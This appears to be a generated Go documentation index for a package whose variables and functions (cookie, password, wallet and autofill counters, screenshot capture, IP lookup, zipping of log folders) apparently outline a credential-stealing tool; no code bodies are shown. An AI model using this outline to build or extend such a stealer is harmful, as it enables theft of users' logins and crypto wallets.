Documentation ¶
Index ¶
- Variables
- func AddFiles(w *zip.Writer, basePath, baseInZip string)
- func ContainsString(slice []os.DirEntry, value string) bool
- func CopyFile(src, dst string) (int64, error)
- func CopyFolderFiles(src, dst string)
- func CopyTxtFiles(logFolderPath string)
- func CreateStructure(logFolderPath string)
- func GetIP() string
- func GetScreenshot(logFolderPath string)
- func MessageBox(hwnd uintptr, caption, title string, flags uint) int
- func MessageBoxPlain(title, caption string) int
- type SysInfo
Constants ¶
This section is empty.
Variables ¶
View Source
var ( CookieAmount = 0 PasswordAmount = 0 WalletAmount = 0 AutofillAmount = 0 )
View Source
var FoundWallets = ""
View Source
var Info = SysInfo{
Hostname: hostStat.Hostname,
Platform: hostStat.Platform,
CPU: cpuStat[0].ModelName,
RAM: vmStat.Total / 1024 / 1024,
Disk: diskStat.Total / 1024 / 1024,
}
Functions ¶
func CopyFolderFiles ¶
func CopyFolderFiles(src, dst string)
func CopyTxtFiles ¶
func CopyTxtFiles(logFolderPath string)
func CreateStructure ¶
func CreateStructure(logFolderPath string)
func GetScreenshot ¶
func GetScreenshot(logFolderPath string)
func MessageBoxPlain ¶
Types ¶
Source Files ¶
Click to show internal directories.
Click to hide internal directories.